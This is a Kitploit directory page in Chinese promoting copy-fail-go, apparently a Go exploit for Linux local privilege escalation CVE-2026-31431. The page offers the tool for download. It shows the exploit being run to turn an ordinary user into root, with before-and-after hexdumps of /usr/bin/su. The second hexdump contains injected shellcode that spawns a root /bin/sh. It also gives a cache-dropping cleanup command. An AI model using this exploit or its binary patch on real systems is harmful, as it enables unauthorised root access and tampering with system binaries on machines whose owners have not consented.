Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
copy-fail-go — 基于 Go 的 CVE-2026-31431 漏洞利用程序,该漏洞为本地权限提升漏洞,通过修改 /usr/bin/su 在 Linux 发行版上获取 root 访问权限。 | Kitploit
工具/GitHubGitHub/cs8425/copy-fail-go
权限提升漏洞利用框架漏洞分析漏洞利用二进制利用
GitHubcs8425/copy-fail-go

copy-fail-go

基于 Go 的 CVE-2026-31431 漏洞利用程序,该漏洞为本地权限提升漏洞,通过修改 /usr/bin/su 在 Linux 发行版上获取 root 访问权限。

查看仓库
223个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Copy Fail - CVE-2026-31431 - golang 版本

⚠️ 警告:该程序极其危险且属于实验性质。清除漏洞利用需要手动清理。使用风险自负!

技术分析文章

原始仓库

运行

运行前检查 /usr/bin/su:

root@kitploit:~
user@pc:~$ hexdump -n 300 -x /usr/bin/su
0000000    457f    464c    0102    0001    0000    0000    0000    0000
0000010    0003    003e    0001    0000    44d0    0000    0000    0000
0000020    0040    0000    0000    0000    d1c0    0000    0000    0000
0000030    0000    0000    0040    0038    000d    0040    001f    001e
0000040    0006    0000    0004    0000    0040    0000    0000    0000
0000050    0040    0000    0000    0000    0040    0000    0000    0000
0000060    02d8    0000    0000    0000    02d8    0000    0000    0000
0000070    0008    0000    0000    0000    0003    0000    0004    0000
0000080    0318    0000    0000    0000    0318    0000    0000    0000
0000090    0318    0000    0000    0000    001c    0000    0000    0000
00000a0    001c    0000    0000    0000    0001    0000    0000    0000
00000b0    0001    0000    0004    0000    0000    0000    0000    0000
00000c0    0000    0000    0000    0000    0000    0000    0000    0000
00000d0    2608    0000    0000    0000    2608    0000    0000    0000
00000e0    1000    0000    0000    0000    0001    0000    0005    0000
00000f0    3000    0000    0000    0000    3000    0000    0000    0000
0000100    3000    0000    0000    0000    6eb1    0000    0000    0000
0000110    6eb1    0000    0000    0000    1000    0000    0000    0000
0000120    0001    0000    0004    0000    a000    0000                
000012c

运行 exp.go:

root@kitploit:~
user@pc:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),132(lxd),133(sambashare),135(docker)
user@pc:~$ go run exp.go
# id
uid=0(root) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),132(lxd),133(sambashare),135(docker)
# 

运行后检查 /usr/bin/su:

root@kitploit:~
user@pc:~$ hexdump -n 300 -x /usr/bin/su
0000000    457f    464c    0102    0001    0000    0000    0000    0000
0000010    0002    003e    0001    0000    0078    0040    0000    0000
0000020    0040    0000    0000    0000    0000    0000    0000    0000
0000030    0000    0000    0040    0038    0001    0000    0000    0000
0000040    0001    0000    0005    0000    0000    0000    0000    0000
0000050    0000    0040    0000    0000    0000    0040    0000    0000
0000060    009e    0000    0000    0000    009e    0000    0000    0000
0000070    1000    0000    0000    0000    c031    ff31    69b0    050f
0000080    8d48    0f3d    0000    3100    6af6    583b    0f99    3105
0000090    6aff    583c    050f    622f    6e69    732f    0068    0000
00000a0    001c    0000    0000    0000    0001    0000    0000    0000
00000b0    0001    0000    0004    0000    0000    0000    0000    0000
00000c0    0000    0000    0000    0000    0000    0000    0000    0000
00000d0    2608    0000    0000    0000    2608    0000    0000    0000
00000e0    1000    0000    0000    0000    0001    0000    0005    0000
00000f0    3000    0000    0000    0000    3000    0000    0000    0000
0000100    3000    0000    0000    0000    6eb1    0000    0000    0000
0000110    6eb1    0000    0000    0000    1000    0000    0000    0000
0000120    0001    0000    0004    0000    a000    0000                
000012c

恢复

需要 root 权限,或重启

root@kitploit:~
root@pc:~# echo 3 > /proc/sys/vm/drop_caches
下载工具